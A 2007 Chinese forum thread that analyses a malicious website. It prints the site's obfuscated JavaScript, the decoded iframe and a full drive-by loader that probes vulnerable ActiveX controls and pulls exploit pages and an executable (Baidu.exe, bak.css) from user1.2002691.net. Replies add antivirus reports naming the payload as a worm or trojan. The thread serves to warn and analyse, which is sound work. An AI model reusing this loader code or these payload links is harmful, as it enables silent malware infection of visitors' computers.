[恶意网站播报]http://www.55sss.com/

dikex

先转到：1.avttt.com；
之后随便进入一个区（别顾着看而忘了正经事^_^）可以发现如下类似的代码：
<SCRIPT language=JavaScript>
<!--
var HtmlStrings=["=jgsbnf!obnf>J2!tsd>#iuuq;00mjbo/bbuuu/dpn0iunm0lu0joefy/iunm#!r","vbmjuz>ijhi!XJEUI>#211&#!IFJHIU>#211&#!NBSHJOXJEUI>#1#!NBSHJO","IFJHIU>#1#!ITQBDF>#1#!WTQBDF>#1#!GSBNFCPSEFS>#1#!TDSPMMJOH>#z","ft#[1]>=0jgsbnf[1]>"];
function psw(st){

var varS;

varS="";

var i;

for(var a=0;a<st.length;a++){

i = st.charCodeAt(a);

if (i==1)

varS=varS+String.fromCharCode('"'.charCodeAt()-1);

else if (i==2) {

a++;

varS+=String.fromCharCode(st.charCodeAt(a));

}

else

varS+=String.fromCharCode(i-1);

}

return varS;
};
var num=4;
function S(){
for(i=0;i<num;i++)

document.write(psw(HtmlStrings));}
S();
// -->
</SCRIPT>

解密得：
<iframe name=I1 src="http://lian.aattt.com/html/bt/index.html" quality=high WIDTH="100%" HEIGHT="100%" MARGINWIDTH="0" MARGINHEIGHT="0" HSPACE="0" VSPACE="0" FRAMEBORDER="0" SCROLLING="yes"></iframe>

http://lian.aattt.com/html/bt/index.html源码的最下面：
<iframe src="/tongji.htm" width="20" height="0" frameborder="0"></iframe>
<iframe src=http://user1.2002691.net/3.html width=100 height=0></iframe>

第一个是统计，无视；第二个：
<script>
window.defaultStatus="完成";
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='OK=Yes;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http://user1.2002691.net/ms06014.js></script>")}
else{
try{var f;
var storm=new ActiveXObject("IERPCtl.IERPCtl.1}
catch(f){};
finally{if(f!="[object Error]"){
document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http://user1.2002691.net/real.js></script>')}}
try{var g;
var pps=new ActiveXObject("MPS.StormPlayer}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src="http://user1.2002691.net/StormII.html"></iframe>')}}
try{var h;
var yahoo=new ActiveXObject("Pdg2}
catch(h){};
finally{if(h!="[object Error]"){
document.write('<iframe style=display:none src="http://user1.2002691.net/sreader.html"></iframe>')}}
try{var i;
var ourgame=new ActiveXObject("GLCHAT.GLChatCtrl.1}
catch(i){};
finally{if(i!="[object Error]"){
document.write('<iframe style=display:none src="http://user1.2002691.net/GLWORLD.html"></iframe>')}}
try{ var j;
var storm=new ActiveXObject("PPlayer.XPPlayer.1}
catch(j){};
finally{ if(j!="[object Error]"){
document.write('<iframe width=100 height=0 src=http://user1.2002691.net/Thunder.html></iframe>')}}
try{var k;
var Fuck=new ActiveXObject("BaiduBar.Tool}
catch(k){};
finally{if(k!="[object Error]"){
Fuck["DloadDS"]("http://user1.2002691.net/Baidu.cab", "Baidu.exe", 0)}}
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && i=="[object Error]" && j=="[object Error]" && k=="[object Error]")
{
document.write("<DIV style="CURSOR: url('http://user1.2002691.net/Ani.js')"></DIV>}
}}}
</script>

一堆东西，选几个，找到毒的链接都是这个：

http://user1.2002691.net/bak.css

剩下的以及其他区的估计都是这个，懒得看了。


[ 本帖最后由 dikex 于 2007-12-26 16:35 编辑 ]

啊弥陀佛

Fuck["DloadDS"]("http://user1.2002691.net/Baidu.cab", "Baidu.exe", 0)}}
http://user1.2002691.net/bak.css

两个是一样的

绅博周幸

扫描报告
2007年12月26日 0:45:44 - 0:45:44
计算机名称: XING-PC
扫描类型: 扫描指定目标
目标: C:\Users\Xing\Desktop\Downloads\Baidu.exe


--------------------------------------------------------------------------------

结果
没发现恶意软件




--------------------------------------------------------------------------------

统计信息
已扫描:
文件: 2
未扫描: 0
结果:
病毒: 0
间谍软件: 0
可疑对象: 0
危险软件: 0
操作:
已杀毒: 0
已重命名: 0
删除: 0
已隔离: 0
失败: 0
引导区:
已扫描: 0
受感染: 0
可疑对象: 0
已杀毒: 0


--------------------------------------------------------------------------------

选项
病毒定义版本:
病毒: 2007-12-26_03
间谍软件: 2007-12-26_03
扫描引擎:
F-Secure AVP: 7.00.171, 2007-12-26
F-Secure Libra: 2.04.01, 2007-12-20
F-Secure Orion: 1.02.37, 2007-12-26
F-Secure Draco: 1.00.35, 2007-11-28
扫描选项:
扫描指定类型的文件: COM EXE SYS OV? BIN SCR DLL SHS HTM HTML HTT VBS JS INF VXD DO? XL? RTF CPL WIZ HTA PP? PWZ P?T MSO PIF . ACM ASP AX CNV CSC DRV INI MDB MPD MPP MPT OBD OBT OCX PCI TLB TSP WBK WBT WPC WSH VWP WML BOO HLP TD0 TT6 MSG ASD JSE VBE WSC CHM EML PRC SHB LNK WSF {* PDF ZL? XML ANI AVB BAT CEO CMD LSP MAP MHT MIF PHP POT WMF NWS TAR TGZ SWF ZIP JAR ARJ LZH TAR TGZ GZ CAB RAR BZ2 HQX
扫描压缩包内部
操作:
病毒: 扫描后询问
间谍软件: 扫描后询问

--------------------------------------------------------------------------------

版权 &copy; 1998-2007 产品支持 | 发送病毒样本到 F-Secure
对于 F-Secure 网页上所链接的由第三方创建和发布的材料， F-Secure 不承担任何责任。 除非已通过电子邮件或 F-Secure CGI 电子邮件向任一台服务器提交材料以清楚说明情况， 您同意 通过 F-Secure 网页或硬拷贝发布已有的材料。 单击带下划线的链接，可访问 F-Secure 公共网站。此时， 系统会在专用访问统计信息中用域名记录您的访问。 此信息不会提供给任何第三方。 您同意不针对所提交的材料向我们提出诉讼。 除非您已明确说明，否则应提交材料以保证 F-Secure 针对可能在 F-Secure 产品/出版物中采用的概念， 不承担任何责任。

leonfg

2007-12-26 16:56:15        HTTP filter        file        hXXp://user1.2002691.net/bak.css        a variant of Win32/Jalous worm        connection terminated - quarantined        CHINESE-GUNDAM\GUNDAM        Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.

[ 本帖最后由 leonfg 于 2007-12-26 16:57 编辑 ]

Graybird

Starting the file scan:

Begin scan in 'E:\bak.css'
E:\bak.css
      [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
      [INFO]      The file was deleted!

cbeiyiwang

这网站
真是汗！

qigang

http://user1.2002691.net/bak.css

为什么没人下载下来改下后缀呢？

qigang

有点早的东西！


瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Trojan.Win32.Undef.akn   

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.24.22

左手

红伞也报了`~~~~~~~~~

EQ也阻了~~~~~~~